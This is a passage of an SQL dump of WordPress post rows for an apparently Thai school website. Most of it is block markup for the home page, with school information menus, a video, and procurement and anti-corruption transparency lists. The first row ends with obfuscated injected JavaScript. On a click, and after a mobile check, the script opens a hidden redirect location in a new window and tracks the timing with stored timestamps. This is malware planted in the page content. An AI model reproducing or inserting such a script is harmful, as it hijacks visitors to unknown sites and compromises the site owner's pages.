Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-23 14:28:42','2024-08-23 07:28:42','',19,'http://watprato.ssk.in.th/?p=203',0,'revision','',0),
(205,2,'2024-08-23 14:30:18','2024-08-23 07:30:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 